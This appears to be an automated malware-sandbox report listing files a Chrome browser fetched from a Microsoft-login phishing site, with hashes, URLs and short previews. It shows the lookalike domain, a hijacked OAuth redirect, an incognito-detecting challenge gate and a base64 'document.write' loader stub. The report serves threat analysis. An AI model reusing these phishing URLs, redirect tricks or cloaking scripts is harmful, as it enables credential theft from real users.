                                                SHA-512:61958093992CF821799768F6ECEAE428FA9E993712124E830A292AFFF944D34214858C80B1FCACB3DC308C6EE3A43B609F8380C52B5D605496B3D25C723FB526
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):3.990210155325004
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                Category:downloaded
                                                Size (bytes):20410
                                                Entropy (8bit):7.980582012022051
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://dovermhainstrim.icu/aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 107x23, components 3
                                                Category:downloaded
                                                Size (bytes):2797
                                                Entropy (8bit):7.505606447654921
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5EC86907C1AC5EF3E117723998FEB8BE
                                                SHA1:5DAA2FEA5A34B0479A33698FC875F9F6C0581FD2
                                                SHA-256:BC2B16B51738B77D94ED7591AD1033FA804297CA9FAAA35222AA65773F749164
                                                SHA-512:AC052ED698BC59B14694C6A47979D20819658620896831E9A538C33AA0083659F2926773FFC3082C9965736C7C6EF11DACCBA8DD3B3C427B535EE2B88BA435E5
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://login.live.com/images/ms-logo-v2.jpg
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:dropped
                                                Size (bytes):2369
                                                Entropy (8bit):4.665873984331825
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:3F85908BA30B2FC9DF425A135F00BED0
                                                SHA1:0B725228D2B748CFC7BFFEBEE1449A887F46E709
                                                SHA-256:808FB7C877F6805C2A8CFA2E8FE4B9A97C80F9D0991A9330E877423167B32702
                                                SHA-512:8CE5BBD9A4D4F36BDC8DC5B442FAD5F4EA12A382EB0226B9A857080F7927D03767CB03F84921C341668D70515991B85D0BCF8064CF2D53C0FBE7CD0D51661368
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<!doctype html>.<html lang="en-US">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title>One more step before you proceed...</title>. <script src="https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js"></script>. <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script>. <script>. let isPrivateMode = false;.. // Check only for Chrome incognito. detectIncognito().then((result) => {. isPrivateMode = (result.browserName === 'Chrome' && result.isPrivate);. console.log('Is Chrome Incognito:', isPrivateMode);. });.. var verifyCallback_CF = function(response) {. if (response && response.length > 10) {. var cfForm = document.querySelector("#cfForm");. cfForm.querySelector('input[name="chromeIncognito"]').value = isPrivateMode ?
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                Category:dropped
                                                Size (bytes):1435
                                                Entropy (8bit):7.8613342322590265
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3233)
                                                Category:downloaded
                                                Size (bytes):4495
                                                Entropy (8bit):5.714692552207427
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:D1B7F733551FD34E3E26D7549E62477A
                                                SHA1:445C00EFA23558489AC6E8D05404BCFA666658FB
                                                SHA-256:DB55E363BF8D738F9F70379C9AB284E6C81ACE7EEECE6AC9E5A0EAED87D11466
                                                SHA-512:A90C13BCEE625684773E8EC61B0247480B72F08C8C4072888530643365F685BECB78F43068E805573A9B5227CC83D13C53949923C9912EE6466BA7CA35404CDC
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://login.live.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2fdovermhainstrim.icu%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuATqU5tXm_dM856-0SInyrFTehYjZ3xOZhlY5SpGZcLG6V9gZHzByHiLSdC_KN0zJbzYLTUltSixJDM_7wKLwCsWHgNmKw4OLgEGCQYFhh8sjItYgbYefaTVZO2r7tOSXqvjX1jPcIpV3ynXLMPfTLvKIqO4tKS4yss3MivbwiTZzNTYL9jDMzgiMi8lt8KstNwtINDWwspwApvQBDamU2wMH9gYO9gZZrEzHOBk3MDDeICX4Qdfx5z3TUcn337n8YpfJ7jYJbXI38gpONsvwNLE0qO00NVEP0vfPNPNJLmwyqTYM8_ZwCjUxNU8Mdl2gwDDAwEGAA2&estsfed=1&uaid=ab83657f8c374b9697b1386c5a41891b&fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com&username=yo.mama%40gmail.com&login_hint=yo.mama%40gmail.com
                                                Preview: ServerInfo: BL02EPF0001D8A2 16.0.30558.4 LocVer:0 --> PreprocessInfo: CBA-0320_153507:0cc54761c00000N, 2025-03-20T16:05:23.0139934-07:00 - Version: 16,0,30558,4 -->. -----Error Info------------------------------------------."/pp1600/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2fdovermhainstrim.icu%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuATqU5tXm_dM856-0SInyrFTehYjZ3xOZhlY5SpGZcLG6V9gZHzByHiLSdC_KN0zJbzYLTUltSixJDM_7wKLwCsWHgNmKw4OLgEGCQYFhh8sjItYgbYefaTVZO2r7tOSXqvjX1jPcIpV3ynXLMPfTLvKIqO4tKS4yss3MivbwiTZzNTYL9jDMzgiMi8lt8KstNwtINDWwspwApvQBDamU2wMH9gYO9gZZrEzHOBk3MDDeICX4Qdfx5z3TUcn337n8YpfJ7jYJbXI38gpONsvwNLE0qO00NVEP0vfPNPNJLmwyqTYM8_ZwCjUxNU8Mdl2gwDDAwEGAA2&estsfed=1&uaid=ab83657f8c374b9697b1386c5a41891b&fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com&usernam
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (834), with no line terminators
                                                Category:downloaded
                                                Size (bytes):834
                                                Entropy (8bit):5.84471456803416
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F9A24328A91D60355A06178583429AF6
                                                SHA1:291A43FCB393C49752B2E964460739E8484A8504
                                                SHA-256:A99B2C903C4554D8D48DA76ACB4C1B3B002794603832915367E049B0CFE6BBAB
                                                SHA-512:AAB7635EC9FC9B362DE20933F7F5BD2A1BAAA535F3DDECD4A980782865D41DC8A7462CF06280C863D022724B705A8A69BB3E258894B255A6D6A8696010FB74E6
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c
                                                Preview:<!doctype html><html><head><meta charset="utf-8"></head><body><script>document.write(atob("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"));</script></body></html>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):56
                                                Entropy (8bit):4.860577243331642
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F220004BD2C441EC576F73CBEA83D539
                                                SHA1:127484ECE51FCB705C8FA91681CBE71AFBC06876
                                                SHA-256:F4014D5129917EE668E2AF3A51054CBF8C6B92DC35741328C643E6CE21B102D3
                                                SHA-512:5526E094B6DC023E7733B8A77A020BD52BB2D1342DAC93DEB473714E34734F2FB93824403518702DE53F02CDCD201A5B81CCA6FDFCE731D7921A1824A8062AE5
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCdYjWRKiStxUEgUN0VtRUhIFDVd69_0hSxDOAb6bE-cSIAklAPr5lmWxTBIFDdFbUVISBQ1Xevf9IUsQzgG-mxPn?alt=proto
                                                Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgAKEgoHDdFbUVIaAAoHDVd69/0aAA==
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                Category:dropped
                                                Size (bytes):621
                                                Entropy (8bit):7.673946009263606
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                Malicious:false
                                                Reputation:unknown
                                                No static file info